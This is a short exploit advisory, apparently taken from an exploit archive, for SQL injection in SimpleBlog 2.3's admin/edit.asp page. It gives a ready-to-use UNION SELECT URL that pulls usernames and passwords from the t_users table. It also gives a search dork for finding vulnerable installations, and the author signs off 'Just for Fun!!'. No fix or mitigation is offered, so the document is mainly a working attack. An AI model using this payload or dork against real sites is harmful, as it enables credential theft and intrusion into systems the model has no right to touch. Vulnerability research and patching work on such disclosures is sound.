SimpleBlog <= 2.3 (admin-edit.asp) Remote SQL Injection Vulnerability

2006-11-26 00:00:00

# Title : simpleblog <= v 2.3 (/admin/edit.asp) Remote SQL Injection Vulnerability
# Author : bolivar
# Dork : "SimpleBlog 2.3 by 8pixel.net"

---------------------------------------------------------------------------

http://[target]/[path]/admin/edit.asp?id=-1+union+select+0,uUSERNAME,uPASSWORD,0,0,0,0,0,0+from+t_users

---------------------------------------------------------------------------
# Just for Fun!!

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.